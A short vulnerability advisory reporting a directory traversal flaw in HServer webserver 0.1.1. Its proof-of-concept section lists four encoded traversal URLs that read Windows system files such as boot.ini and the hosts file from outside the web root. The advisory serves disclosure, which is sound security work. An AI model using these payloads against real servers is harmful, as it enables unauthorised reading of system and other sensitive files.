Title: HServer webserver - Directory Traversal Vulnerability

Software : HServer webserver

Software Version : 0.1.1

Vendor: http://www.luizpicanco.com/index.php?s=hserver
        http://code.google.com/p/hserver/

Vulnerability Published : 2012-01-05

Vulnerability Update Time :

Status :

Impact : High

Bug Description :
HServer webserver(version update : 0.1.1) is a tiny Web server written in Java, it is vulnerable with Directory Traversal Vulnerability.

Proof Of Concept :
http://127.0.0.1:8081/..%5c..%5c..%5cboot.ini
http://127.0.0.1:8081/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts

Credits : This vulnerability was discovered by demonalex@163.com
mail: demonalex@163.com / ChaoYi.Huang@connect.polyu.hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK